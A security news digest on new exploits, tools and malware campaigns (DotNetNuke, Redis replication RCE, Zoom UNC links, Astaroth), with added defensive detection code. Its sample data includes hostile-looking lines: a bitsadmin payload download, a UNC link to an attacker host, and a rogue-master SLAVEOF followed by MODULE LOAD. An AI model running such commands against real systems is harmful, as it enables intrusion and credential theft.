Vulners weekly digest #3

Weekly overview of new vulnerabilities, exploits, tools and other news from the world of information security.

Vulners has officially integrated with EXPLOITPACK this week. Customers can now get even more information about the vulnerabilities they care about in one place.

All interest in the difference 🙂


Exploits


Congratulations, this week brought a working exploit for CVE-2020-0796. We wrote about this vulnerability in our previous digest:

Time to patch, and to test the exploit (in your own lab, or to build detections 🙂).

DotNetNuke

A new Metasploit module for DotNetNuke (versions 5.0.0 to 9.3.0-RC) was recently added. Vulnerable versions store user profile information in the DNNPersonalization cookie as XML. The expected structure includes a “type” attribute that tells the server which type of object to create during deserialization, so whoever controls the cookie controls what gets instantiated. The cookie is processed when DNN is configured to handle 404 errors with its built-in error page (the default configuration). An attacker can use this vulnerability for remote code execution on the target system.

https://vulners.com/zdt/1337DAY-ID-34183
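The detection side of the issue above, as an added example that is not part of the original digest or of DotNetNuke: a small inspector that URL-decodes a DNNPersonalization cookie, parses the XML and flags any item whose “type” attribute names something outside an allowlist of profile value types. The allowlist, the exact XML shape and both sample cookies are assumptions constructed for the example, not captured traffic.

```python
import urllib.parse
import xml.etree.ElementTree as ET

# Assumed allowlist: item types a profile cookie legitimately carries. Any other
# type name (or a generic type, marked by '`') is treated as a deserialization attempt.
ALLOWED_TYPES = {"System.String", "System.Int32", "System.Boolean", "System.DateTime"}

def parse_personalization_cookie(raw_value):
    """Return (type_names, error) for a DNNPersonalization cookie value.

    The cookie is URL-encoded XML; every <item> carries a 'type' attribute that
    names the .NET type the server instantiates when it deserializes the item.
    """
    decoded = urllib.parse.unquote(raw_value)
    try:
        root = ET.fromstring(decoded)
    except ET.ParseError as exc:
        return [], f"malformed XML: {exc}"
    return [el.attrib["type"] for el in root.iter() if "type" in el.attrib], None

def suspicious_types(raw_value):
    """Type names in the cookie that are not on the allowlist."""
    types, err = parse_personalization_cookie(raw_value)
    if err:
        return ["unparseable cookie"]
    flagged = []
    for full_name in types:
        base_name = full_name.split(",")[0].strip()   # drop the assembly qualification
        if base_name not in ALLOWED_TYPES or "`" in full_name:
            flagged.append(full_name)
    return flagged

def scan_request(headers):
    """Inspect one request's headers (dict). Returns flagged types, [] if clean or absent."""
    for part in headers.get("Cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "DNNPersonalization":
            return suspicious_types(value)
    return []

# Constructed samples (not real traffic): a benign profile cookie and one whose
# 'type' attribute names a hypothetical gadget type.
BENIGN_COOKIE = urllib.parse.quote(
    '<profile><item key="name1:key1" type="System.String"><string>hello</string></item></profile>')
SUSPECT_COOKIE = urllib.parse.quote(
    '<profile><item key="name1:key1" '
    'type="Some.Namespace.Gadget, SomeAssembly, Version=1.0.0.0, PublicKeyToken=0123456789abcdef">'
    '<data>...</data></item></profile>')

if __name__ == "__main__":
    print("benign :", suspicious_types(BENIGN_COOKIE))
    print("suspect:", suspicious_types(SUSPECT_COOKIE))
```

Run it over proxy or WAF logs for requests that end up at the 404 handler; a cookie that fails to parse at all is worth a look too, since a legitimate client never sends one.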

Redis Replication Code Execution

Vulners assigns its own AI score to many exploits and vulnerabilities. The Redis exploit gained a fairly high rating and became more popular after a recent bug fix. It abuses the module API introduced in Redis 4.0.0, which extends the server with native code and therefore allows arbitrary code execution, and delivers the malicious module through Redis master-slave replication: the target is pointed at a rogue master, which ships the module file during the full sync.

https://vulners.com/zdt/1337DAY-ID-34165
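What the attack chain looks like from the server side, as an added example that is not part of the original digest or of Redis: a parser for MONITOR output that raises an alert when a client first points the instance at a master outside a trusted list and then issues MODULE LOAD shortly afterwards. The trusted-master set, the time window and the sample MONITOR lines are constructed for the example.

```python
import re

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # quoted arguments as MONITOR prints them

TRUSTED_MASTERS = {"10.0.0.10:6379"}   # assumed: the only legitimate replication source
WINDOW_SECONDS = 120.0                 # assumed: how long a rogue SLAVEOF stays "hot"

def parse_monitor_line(line):
    """Returns (timestamp, client, COMMAND, [args]) or None for a non-MONITOR line."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return float(m.group("ts")), m.group("client"), args[0].upper(), args[1:]

def detect_replication_rce(lines):
    """Alerts as (rule, client, detail) tuples, in the order they were raised."""
    alerts = []
    pending = {}   # client -> (ts, master) after a SLAVEOF/REPLICAOF to an untrusted host
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, cmd, args = parsed
        if cmd in ("SLAVEOF", "REPLICAOF") and len(args) >= 2:
            if args[0].upper() == "NO" and args[1].upper() == "ONE":
                pending.pop(client, None)   # replication switched off again
                continue
            master = f"{args[0]}:{args[1]}"
            if master not in TRUSTED_MASTERS:
                pending[client] = (ts, master)
                alerts.append(("replication_to_untrusted_master", client, master))
        elif cmd == "MODULE" and args and args[0].upper() == "LOAD":
            path = args[1] if len(args) > 1 else "?"
            if client in pending and ts - pending[client][0] <= WINDOW_SECONDS:
                alerts.append(("module_load_after_rogue_replication", client, path))
            else:
                alerts.append(("module_load", client, path))
    return alerts

# Constructed MONITOR output: one client re-points the server and loads a module,
# another client sets up replication with the trusted master.
SAMPLE_MONITOR = [
    '1586000000.100000 [0 10.0.0.5:52314] "PING"',
    '1586000001.200000 [0 10.0.0.5:52314] "SLAVEOF" "10.0.0.99" "6379"',
    '1586000003.500000 [0 10.0.0.5:52314] "MODULE" "LOAD" "/tmp/exp.so"',
    '1586000004.000000 [0 10.0.0.5:52314] "SLAVEOF" "NO" "ONE"',
    '1586000010.000000 [0 10.0.0.7:40000] "REPLICAOF" "10.0.0.10" "6379"',
]

if __name__ == "__main__":
    for alert in detect_replication_rce(SAMPLE_MONITOR):
        print(alert)
```

MONITOR is expensive on a busy instance, so in production this belongs on a log feed rather than a live MONITOR session. The cheaper fix is configuration: keep protected-mode on, bind to internal interfaces, set requirepass, and rename or disable the MODULE command on instances that never load modules.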

More research about Vulners AI score: https://vulners.blog/2020/04/02/hidden-threat-vulnerability-analysis-using-the-news-graph


INFOSEC TOOLS

JACKDAW

This tool helps you collect information about a domain, store it in a SQL database and display it as a graph, giving a better understanding of how Active Directory objects interact with each other. Main features:

  • Data acquisition;
  • Graph building;
  • Anomaly detection.

Webkiller v2.0

A simple information-gathering tool. If you don’t want to learn large and intricate OSINT frameworks, you will like this one.

Pulsar 

Pulsar is an automated framework with a GUI for red teams, pentesters and bug bounty hunters. If you like full-scale, holistic tools, it will keep you busy for a long time and may become a permanent part of your kit. The framework integrates several projects:

The full structure of the project:

SauronEye

A simple search tool for finding files that contain specific keywords. Main features:


ZOOM and MITRE

If coronavirus is topic number one in IT news, then ZOOM has definitely taken second place in recent days.

The ZOOM client converts a URL pasted into the chat into a hyperlink. Unfortunately, it also converts UNC paths, which Windows uses to access network resources, into hyperlinks.

When a user clicks such a hyperlink, Windows connects to the remote host over SMB and tries to authenticate, sending the username and an NTLM challenge-response (the Net-NTLM hash) to the other side. The latter can be cracked offline given modern computing power.

Thus an attacker who sends a specially crafted link into the application’s chat can later obtain the user’s login and password. A UNC path can also point at a local executable, which Windows will offer to run, although in that case it asks for confirmation first.

More detailed: https://vulners.com/thn/THN:679E49F88578E2E63101319B5AB7DAAC
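The linkification bug described above, as an added example that is not part of the original digest or of the ZOOM client: a vulnerable link finder that treats UNC paths as links beside a hardened one that only ever links http(s) URLs, so nothing a user clicks can start an outbound SMB connection. The regexes and the sample chat message are constructed for the example.

```python
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r'[a-zA-Z][a-zA-Z0-9+.-]*://[^\s<>"]+')   # any scheme://...
UNC_RE = re.compile(r'\\\\[^\s\\<>"]+(?:\\[^\s\\<>"]+)*')      # \\host\share\path
SAFE_SCHEMES = {"http", "https"}

def find_links_vulnerable(text):
    """Everything that looks like a link, UNC paths included, becomes clickable."""
    return URL_RE.findall(text) + UNC_RE.findall(text)

def find_links_hardened(text):
    """Only http(s) URLs become links; UNC paths and file:// URLs stay plain text."""
    safe = []
    for candidate in URL_RE.findall(text):
        if urlsplit(candidate).scheme.lower() in SAFE_SCHEMES:
            safe.append(candidate)
    return safe

def render(text, find_links):
    """Wrap each link found by `find_links` in an anchor tag (longest first so a
    shorter link never clobbers part of a longer one)."""
    out = text
    for link in sorted(set(find_links(text)), key=len, reverse=True):
        out = out.replace(link, f'<a href="{link}">{link}</a>')
    return out

# Constructed chat message: one normal URL and one UNC path pointing at an attacker host.
MSG = r"Notes at https://example.com/notes and the deck at \\attacker.example\share\deck.pptx"

if __name__ == "__main__":
    print("vulnerable:", render(MSG, find_links_vulnerable))
    print("hardened  :", render(MSG, find_links_hardened))
```

The client-side fix only removes the click; the network-side control that stops the credential leak regardless of which application misbehaves is blocking outbound TCP 445 at the perimeter.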

Judging by the low AI score of the news about ZOOM vulnerabilities, we can conclude that most of them are hype and do not matter much:

One of the most important events for everyone who tries to detect APT attacks and analyse endpoint logs: MITRE ATT&CK sub-techniques (beta). The current official release is still the October 2019 version.

The version of ATT&CK with sub-techniques is only in beta right now, to allow enough time for feedback and for organizations to determine how to transition. MITRE expects to make it the official version sometime in July 2020.

One good example of the benefits of sub-techniques is T1003. The name was changed slightly to OS Credential Dumping and the technique itself was kept, with its sub-techniques listed beneath it:

(figure: Technique T1003 and its sub-techniques)

The added granularity lets you represent the different kinds of credential dumping at a more detailed level than a single mapping to the broad OS Credential Dumping technique. MITRE is asking for feedback on technique and sub-technique pairings, as well as for ideas for additional techniques or sub-techniques that would help organize the remaining techniques that have none.

More detailed info in MITRE blog: https://medium.com/mitre-attack/attack-subs-what-you-need-to-know-99bce414ae0b

Attack matrix for Kubernetes

This week Microsoft published an ATT&CK-like matrix of the major techniques relevant to container orchestration security, with a focus on Kubernetes:

Understanding the attack surface of containerized environments is the first step in building security solutions for them. The matrix can help organizations identify the current gaps in their defensive coverage against the different threats that target Kubernetes.

https://vulners.com/mssecure/MSSECURE:B88202FB5B97F91B4C2853079E60CFF1

Hidden Threat – Vulnerability Analysis using the news graph

When you come face to face with a new vulnerability, what is your first thought? Of course: respond as quickly as possible. But speed is only one condition for fighting information security threats effectively. In corporate security it is equally important to determine, without error, what to respond to first. An underestimated threat can cause serious damage or loss of reputation. And when the number of vulnerabilities keeps growing, can you quickly assess their significance without missing crucial details?

Vulnerability dynamics by CVSS group (source – vulners.com)

The CVSS (Common Vulnerability Scoring System) score is the scale typically used to rank vulnerabilities by a set of criteria, from exploitation complexity to impact and other parameters.

Why invent something else? Because the CVSS score has one weak point: it is based on expert evaluation that is not backed by real statistics. It would be far more effective to offer experts cases already selected by quantitative criteria and to make decisions on verified data. But where does this data come from, and what do you do with it? That sounds like an unusual and interesting task for a data scientist, and this challenge inspired Lydia Khramova and the Vulners team to create a new concept for assessing and classifying vulnerabilities based on a graph of related information.

Why graphs? For social networks and the media, graph methods have long been used successfully for various purposes: analysing how content spreads through the news stream, measuring the influence of top authors on readers’ opinions, clustering a social network by interests. Any vulnerability can likewise be represented as a graph of data: news about changes in software or hardware and the effects they cause.

About data

Lydia did not have to collect the news about each update manually; all the necessary texts were already in the vulners.com open vulnerability database. Visually, the data looks like this:

Each vulnerability, in addition to its name, publication date and description, already has a type (cve, nessus, etc.) and a family (NVD, scanner, exploit, etc.) assigned, a CVSS score (CVSS v2 is used throughout), and links to related news.

If you draw these links as a graph, one vulnerability looks like this: the orange circle is the original (parent) publication, black circles are news items that can be clicked on from the parent page, and grey circles are linked news that can only be reached by going through the publications marked in black. Each colour is a new level of the graph of related information, from level zero (the initial vulnerability) to the first, second and so on.

Of course, when viewing one news item we know only the zero and first levels, so to collect all the data we traversed the graph depth-first, which unravels the tangle of news from the start to the most recently connected nodes (hereinafter, graph nodes). At this stage optimization problems arose: building a graph over a long period took too much time, and some magic had to be applied to both the script and the data structure. The final data was packed into Parquet for further work with Spark SQL, which made the initial analysis easier.

What does the graph data look like? Visualization is the best way to understand its nature. The figure shows the graph of the well-known, but supposedly not very dangerous, Heartbleed vulnerability (only 5 out of 10 points on the CVSS scale).

Looking at this lush cloud of points made up of related news and exploits, where the red dot is the original vulnerability, we realise that Heartbleed was significantly underestimated.

This example suggests that consistency, duration and other vulnerability parameters can be evaluated well with graph metrics. Below are a few of the metrics from the study that served as the basis for an alternative classification:

  • the number of nodes in the graph: the “breadth” of the vulnerability and the fingerprints it left in various systems;
  • the number of subgraphs (large clusters of news): the granularity of the problem, or the presence of large problem areas within the vulnerability;
  • the number of related exploits and patches: how explosive the news was and how many times it had to be fixed;
  • the number of unique news types and families in the graph: systemicity, i.e. the number of subsystems affected by the vulnerability;
  • the time from the first publication to the first exploit, and from the first publication to the last related news: the temporal nature of the vulnerability, whether it drags a long tail of consequences or develops and fades quickly.

Not all metrics are described here; under the hood the research now has about 30 indicators complementing the basic set of CVSS criteria, including the average growth between levels of the vulnerability news graph, the percentage of exploits at the first level of the graph, and much more.
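The graph traversal and the metrics above, as an added example that is not part of the original study or of Vulners code: a depth-first walk over a tiny constructed bulletin database in the shape the text describes (type, family, publication date, CVSS and links to related bulletins), followed by the node, subgraph, exploit/patch, diversity and timing metrics for one root vulnerability. The sample bulletins, the family sets used to count exploits and patches, and the reading of “subgraphs” as connected clusters left once the root is removed are all assumptions made for the example.

```python
from datetime import date

# Constructed sample bulletins (ids and dates are invented, not real Vulners data).
SAMPLE_DB = {
    "CVE-0000-0001": dict(type="cve", family="NVD", published=date(2019, 1, 3), cvss=5.0,
                          references=["NESSUS-1", "EXP-1", "BLOG-1"]),
    "NESSUS-1": dict(type="nessus", family="scanner", published=date(2019, 1, 5), cvss=5.0,
                     references=["CVE-0000-0001", "PATCH-1"]),
    "EXP-1": dict(type="exploitdb", family="exploit", published=date(2019, 1, 9), cvss=5.0,
                  references=["CVE-0000-0001", "EXP-2"]),
    "EXP-2": dict(type="zdt", family="exploit", published=date(2019, 1, 20), cvss=5.0,
                  references=["EXP-1"]),
    "BLOG-1": dict(type="thn", family="blog", published=date(2019, 1, 7), cvss=0.0,
                   references=[]),
    "PATCH-1": dict(type="redhat", family="unix", published=date(2019, 1, 15), cvss=5.0,
                    references=["CVE-0000-0001"]),
}

EXPLOIT_FAMILIES = {"exploit"}           # assumed mapping of families to "exploit"
PATCH_FAMILIES = {"unix", "software"}    # assumed mapping of families to "patch"

def build_graph(db, root_id):
    """Depth-first traversal from the root. Returns {node_id: level}, where the level is
    the depth at which DFS first discovered the node (0 = root, 1 = linked from the root
    page, 2 = reached only through level-1 nodes, ...)."""
    levels = {root_id: 0}
    stack = [root_id]
    while stack:
        node = stack.pop()
        for ref in db[node]["references"]:
            if ref in db and ref not in levels:
                levels[ref] = levels[node] + 1
                stack.append(ref)
    return levels

def count_subgraphs(db, levels, root_id):
    """Connected components of the related-news graph once the root is removed."""
    nodes = [n for n in levels if n != root_id]
    adj = {n: set() for n in nodes}
    for n in nodes:
        for ref in db[n]["references"]:
            if ref in adj:
                adj[n].add(ref)
                adj[ref].add(n)
    seen, components = set(), 0
    for n in nodes:
        if n in seen:
            continue
        components += 1
        stack = [n]
        while stack:
            cur = stack.pop()
            if cur not in seen:
                seen.add(cur)
                stack.extend(adj[cur] - seen)
    return components

def cvss_group(score):
    """The three CVSS bins used in the study: High >= 8, Medium 6..8, Low < 6."""
    if score >= 8.0:
        return "High"
    if score >= 6.0:
        return "Medium"
    return "Low"

def graph_metrics(db, root_id):
    levels = build_graph(db, root_id)
    root = db[root_id]
    related = [db[n] for n in levels if n != root_id]
    exploits = [b for b in related if b["family"] in EXPLOIT_FAMILIES]
    patches = [b for b in related if b["family"] in PATCH_FAMILIES]
    first_exploit = min((b["published"] for b in exploits), default=None)
    last_news = max((b["published"] for b in related), default=root["published"])
    return {
        "nodes": len(levels),
        "subgraphs": count_subgraphs(db, levels, root_id),
        "exploits": len(exploits),
        "patches": len(patches),
        "unique_types": len({b["type"] for b in related}),
        "unique_families": len({b["family"] for b in related}),
        "days_to_first_exploit": (first_exploit - root["published"]).days if first_exploit else None,
        "days_to_last_news": (last_news - root["published"]).days,
        "cvss_group": cvss_group(root["cvss"]),
    }

if __name__ == "__main__":
    for key, value in graph_metrics(SAMPLE_DB, "CVE-0000-0001").items():
        print(f"{key:>22}: {value}")
```

A breadth-first walk would assign shortest-path levels; the depth-first version above matches the study’s description and visits exactly the same nodes, so the node, cluster and family counts are unaffected.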

Opening up the gray zone

And now a bit of data science and statistics: hypotheses need to be confirmed on data, right?

For the experiment with an alternative scale and new metrics, news published in January 2019 was selected: 2403 bulletins and about 150 thousand rows in the related-news column. All source vulnerabilities were divided into three groups by CVSS score:

  • High: 8 points and above;
  • Medium: from 6 (inclusive) to 8 points;
  • Low: below 6 points.

Let’s see how the CVSS score correlates with the number of related news items in the graph, the number of news types and the number of exploits:

Ideally we would have seen a clear separation of the metrics into three clusters, but that did not happen, which pointed to a gray area that the CVSS score does not capture. That is our target.

The next step was clustering vulnerabilities into homogeneous groups and building a new scale.

For the first iteration a simple metric-based clusterer, k-means, was chosen, and a new matrix of estimates was obtained: the initial groups (Medium, Low, High) are on the Y axis; on the X axis are the new classes, where 2 is the highest by the new vulnerability metrics, 1 is the middle and 0 is the lowest.

The oval-marked zone (vulnerability class 2 with an initial Low or Medium rating) contains potentially underestimated vulnerabilities. The division into the new classes also looks clearer, which is what we were after:
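The clustering step and the crosstab it produces, as an added example that is not part of the original study or of Vulners code: a plain k-means over standardized graph metrics (node count, number of news types, number of exploits), relabelled so that class 2 is the most graph-active, then tabulated against the CVSS group to pull out the “gray zone” of Low/Medium vulnerabilities that land in class 2. The metric rows are constructed for the example, and the deterministic seeding (spreading the initial centroids across the points sorted by summed z-score) is a choice made here so the run is reproducible, not the study’s method.

```python
import math
import statistics

# Constructed sample: (bulletin id, CVSS group, node count, unique news types, exploit count).
SAMPLE_METRICS = [
    ("V1", "Low", 3, 2, 0), ("V2", "Medium", 4, 2, 0), ("V3", "Low", 5, 3, 0),
    ("V4", "Medium", 20, 6, 1), ("V5", "High", 25, 7, 1), ("V6", "Medium", 18, 5, 2),
    ("V7", "High", 120, 14, 8), ("V8", "Low", 140, 16, 9), ("V9", "High", 110, 13, 7),
]

def standardize(rows):
    """Column-wise z-scores so that node counts do not swamp the smaller metrics."""
    cols = list(zip(*rows))
    means = [statistics.mean(c) for c in cols]
    stds = [statistics.pstdev(c) or 1.0 for c in cols]
    return [[(v - m) / s for v, m, s in zip(r, means, stds)] for r in rows]

def _dist(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def kmeans(points, k=3, max_iter=100):
    """Lloyd's k-means. Seeding: initial centroids are the smallest, middle and largest
    points by summed z-score, which makes the run deterministic."""
    order = sorted(range(len(points)), key=lambda i: sum(points[i]))
    centroids = [points[order[j * (len(points) - 1) // (k - 1)]] for j in range(k)]
    labels = [None] * len(points)
    for _ in range(max_iter):
        new_labels = [min(range(k), key=lambda c: _dist(p, centroids[c])) for p in points]
        if new_labels == labels:
            break
        labels = new_labels
        for c in range(k):
            members = [p for p, l in zip(points, labels) if l == c]
            if members:
                centroids[c] = [sum(col) / len(members) for col in zip(*members)]
    # Relabel so class 2 has the highest centroid (most graph activity) and class 0 the lowest.
    rank = {c: r for r, c in enumerate(sorted(range(k), key=lambda c: sum(centroids[c])))}
    return [rank[l] for l in labels]

def classify(metrics):
    """Returns {bulletin id: (cvss_group, graph_class)}."""
    points = standardize([list(r[2:]) for r in metrics])
    return {r[0]: (r[1], c) for r, c in zip(metrics, kmeans(points))}

def crosstab(classified):
    """CVSS group (rows) against graph class (columns), as in the study's matrix."""
    table = {g: {0: 0, 1: 0, 2: 0} for g in ("Low", "Medium", "High")}
    for group, cls in classified.values():
        table[group][cls] += 1
    return table

def gray_zone(classified):
    """Potentially underestimated: Low or Medium CVSS but graph class 2."""
    return sorted(vid for vid, (group, cls) in classified.items() if group != "High" and cls == 2)

if __name__ == "__main__":
    result = classify(SAMPLE_METRICS)
    for group, row in crosstab(result).items():
        print(f"{group:>6}: {row}")
    print("gray zone:", gray_zone(result))
```

As the text warns, the output of an unsupervised method is a shortlist for expert review, not a verdict; the gray-zone list is exactly the set of cases to pull out and inspect by hand.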

However, simply trusting the model is a bad idea, especially for unsupervised clustering, where the correct answer is not known in principle and you can only rely on the separation metrics of the resulting classes.

This is where expert knowledge is required: testing and interpreting the results needs knowledge of the subject area. So it is advisable to spot-check the model, for example by pulling out a couple of vulnerabilities for detailed analysis.

Below are a few cases from the gray zone that have a low CVSS score but a high graph score, and so potentially deserve a different priority. Here is what they look like as graphs:

CVE-2019-0555 (CVSS score 4.4, graph class 2 – high)

SMB_NT_MS19_JAN_DOTNET.NASL (CVSS score 5.0, graph class 2 – high)

CVE-2019-1653 (CVSS score 5.0, graph class 2 – high)

RHSA-2019:0130 (CVSS score 5.0, graph class 2 – high)

As you can see, the concept was confirmed both by statistics and by spot checks, so in the near future we want to finalise and automate the collection of graph metrics and, possibly, the classifier itself. Of course there is still a lot of work to do, starting with collecting a large number of new graphs for the months not covered by the study, but that only adds enthusiasm, as does the essence of the task. According to Lydia, the data scientist, working on this research was an incredibly inspiring experience, both in topic and in complexity; even the preparatory engineering work with loosely structured data was very interesting.

In conclusion

After the study it became clear that, first of all, a critical approach is needed not only to any single metric or dataset but to the process as a whole, because the world is too dynamic and changes faster than methodologies and documentation. Always evaluated one way? Why not try shifting the angle of view? As our example shows, even the most unusual hypotheses can be confirmed.

The availability of data to data scientists plays an important role: it lets you quickly test the boldest hypotheses and better understand your subject area in all its manifestations. So if you are not yet collecting, or are deleting, “unnecessary” data, think again: there may be many discoveries lurking there. This case suggests that a data-driven approach and information security complement each other perfectly.

Source: https://habr.com/ru/post/494332/

Author: Lydia Khramova (https://www.linkedin.com/in/lydia-khramova)

Vulners weekly digest #2

Weekly overview of new vulnerabilities, exploits, tools and other news from the world of information security


EXPLOITS and vulnerabilities

Microsoft continues to attract most of the hype around critical vulnerabilities.
On March 23rd Microsoft released a new warning about two critical zero-day vulnerabilities that could allow attackers to remotely take control of targeted computers. Both vulnerabilities are in the Windows Adobe Type Manager Library, a font-parsing component that not only parses content in third-party software but is also used by Explorer to display the content of a file in the ‘Preview Pane’ or ‘Details Pane’ without the user opening it.
25 March: according to Microsoft, the risk for Windows 10 is low.
From all the descriptions and reviews we can conclude that real-world exploitability is fairly low. But you should not wait for this to show up in APT reports or in public exploit databases.

“Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month.”

Main description from Microsoft:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006

SharePoint

A new Metasploit module was added for CVE-2020-0646. It gives an attacker remote code execution by sending specially crafted XOML data to SharePoint via the Workflows functionality.

https://vulners.com/zdt/1337DAY-ID-34152

OSX Privilege Escalation

A vulnerability was found in VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x before 11.0.1) and Horizon Client for Mac (5.x before 5.4.0). Exploiting it lets an attacker escalate from normal user privileges to root on the host. It is worth noting that exploits for OSX are quite rare, and a new Metasploit module is already on the way.

PoC: https://vulners.com/zdt/1337DAY-ID-34121
Forthcoming module: https://github.com/rapid7/metasploit-framework/pull/13123

There are also exploits without any public score or CVE number. The Vulners platform collects and aggregates information and assigns its own AI score, made up of various indicators. This way you can find a lot of information about unique vulnerabilities for which new exploits have been released (including paid ones) that were not mentioned in the news and for which no research has been done. Look at the examples below:

BustaBit

Bustabit is a simple real-time game that you can play for fun or for money. In each round you can place a bet before the round starts, and every tick has a chance to bust; if you do not cash out before the bust, you lose your bet.
This exploit will generate the next 10 game results after starting from your . The author of the paid exploit provides a video PoC of this functionality.

https://vulners.com/zdt/1337DAY-ID-34134

360 Security sandbox escape

Many security vendors provide their own sandboxes. A sandbox is a good way to test malicious samples in an isolated environment: an application running in the sandbox has limited access, with no network communication, file creation and so on. A vulnerability in the 360 Security sandbox bypasses its main protections and allows an attacker to escape, calling other programs or another instance of itself outside the sandbox.

https://vulners.com/zdt/1337DAY-ID-34125


INFOSEC TOOLS

Starkiller

Empire is one of the most famous pentest frameworks. Starkiller is a frontend for PowerShell Empire written in VueJS, and a nice addition to the tool.

uDork – Google Hacking Tool

uDork is a Python script that uses advanced Google search methods. This recon tool uses the open lists from exploit-db.com (Google Hacking Database: https://www.exploit-db.com/google-hacking-database)

Ninja c2

An open-source C2 server created by a purple team for purple teams. It is especially relevant for testing your correlation rules and threat-hunting techniques. Ninja is still in beta; the stable version will contain many more stealthy techniques and anti-forensic methods.

Useful C2 matrix: https://www.thec2matrix.com/matrix


Attack news

Spyware On iPhones

A new watering-hole campaign, discovered on January 10, 2020, uses a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The campaign posted malicious links on multiple forums, disguised as clickbait news from websites or as news about the COVID-19 pandemic.
The malware exploits a “silently patched” Safari vulnerability which, when the page is rendered in the browser, leads to exploitation of a use-after-free memory flaw (tracked as CVE-2019-8605) that gives the attacker code execution with root privileges and lets them install the proprietary LightSpy backdoor. The bug has since been fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3 and watchOS 5.2.1.

By analysing the changes in the first-stage WebKit exploit, Kaspersky found that the list of supported devices was also significantly extended.

The most complete scheme of the described activity, from Trend Micro:

In addition, LightSpy targets messaging applications like Telegram, QQ, and WeChat to steal account information, contacts, groups, messages, and attached files.

Astaroth comes back

Astaroth is information-stealing malware that came back in early February with many changes in functionality. It uses multiple fileless techniques and abuses different legitimate processes to try to run undetected on compromised machines.
Microsoft Defender ATP data showing revival of Astaroth campaigns:

Astaroth now completely avoids WMIC and related techniques in order to bypass existing detections. The attackers introduced new techniques that make the attack chain stealthier:

  • Abusing Alternate Data Streams (ADS) to hide malicious payloads
  • Abusing the legitimate process ExtExport.exe, a highly uncommon attack vector, to load the payload

One of the most significant updates is the use of Alternate Data Streams (ADS), which Astaroth abuses at several stages for various activities. An ADS is an NTFS file attribute that lets a user attach additional data to an existing file. The stream data and its size are not visible in File Explorer, so attackers abuse this feature to hide malicious code in plain sight.
A more practical description is in the research.

  1. Arrival: spear-phishing with an LNK file. When clicked, the LNK file runs an obfuscated BAT command line. The BAT drops a single-line JavaScript file into the Pictures folder and invokes explorer.exe to run it. The dropped one-liner uses the GetObject technique to fetch and run the much larger main JavaScript directly in memory.
  2. BITSAdmin abuse: the main script uses BITSAdmin to download additional binaries from the command-and-control (C2) server.
  3. Alternate Data Streams abuse: Astaroth copies each downloaded file into an ADS and then deletes the original.
  4. ExtExport.exe abuse: the script uses another unobvious technique from the LOLBAS project, ExtExport.exe, to load the payload.
  5. Userinit.exe abuse.
  6. Astaroth payload: while running, the payload reads and decrypts more components from the ADS of desktop.ini.
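The chain above as detection logic, as an added example that is not part of the original digest or of the Microsoft research: a handful of rules run over endpoint events for the stages that leave a process or file trace (explorer.exe launching a script from the Pictures folder, bitsadmin downloads, writes into an alternate data stream, ExtExport.exe execution, userinit.exe started by something other than winlogon.exe). The event format and all sample events are constructed for the example; the Zone.Identifier filter is an assumption to suppress the mark-of-the-web streams browsers write routinely.

```python
import re

# Drive letter, optional directories, then a file name followed by ':stream'.
ADS_RE = re.compile(r'^[A-Za-z]:\\(?:.*\\)?[^\\:]+:[^\\:]+$')
BENIGN_STREAMS = {"Zone.Identifier"}   # assumed noise filter

def _image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Returns a list of (rule, detail) hits for one endpoint event."""
    hits = []
    if ev["event"] == "process_create":
        image = _image_name(ev["image"])
        parent = _image_name(ev.get("parent", ""))
        cmd = ev.get("cmdline", "").lower()
        if image == "explorer.exe" and re.search(r'\S+\.js\b', cmd):
            hits.append(("explorer_launches_script", ev["cmdline"]))     # stage 1
        if image == "bitsadmin.exe" and "/transfer" in cmd:
            hits.append(("bitsadmin_download", ev["cmdline"]))           # stage 2
        if image == "extexport.exe":
            hits.append(("extexport_lolbin", ev["cmdline"]))             # stage 4
        if image == "userinit.exe" and parent != "winlogon.exe":
            hits.append(("userinit_unexpected_parent", ev.get("parent", "")))  # stage 5
    elif ev["event"] == "file_create":
        target = ev["target"]
        if ADS_RE.match(target) and target.rsplit(":", 1)[-1] not in BENIGN_STREAMS:
            hits.append(("ads_write", target))                           # stages 3 and 6
    return hits

def scan(events):
    """(event index, rule, detail) for every hit across a list of events."""
    return [(i, rule, detail) for i, ev in enumerate(events) for rule, detail in check_event(ev)]

# Constructed events in an assumed Sysmon-like shape; paths and the C2 address are invented.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"explorer.exe C:\Users\alice\Pictures\r1.js"},
    {"event": "process_create", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"bitsadmin /transfer job /priority foreground http://203.0.113.5/x.log C:\Users\alice\Pictures\x.log"},
    {"event": "file_create", "target": r"C:\Users\alice\Pictures\desktop.ini:x.log"},
    {"event": "process_create", "image": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"ExtExport.exe C:\Users\alice\Pictures a b"},
    {"event": "process_create", "image": r"C:\Windows\System32\userinit.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "userinit.exe"},
    {"event": "process_create", "image": r"C:\Windows\System32\userinit.exe",
     "parent": r"C:\Windows\System32\winlogon.exe", "cmdline": "userinit.exe"},
    {"event": "file_create", "target": r"C:\Users\alice\Downloads\setup.exe:Zone.Identifier"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```
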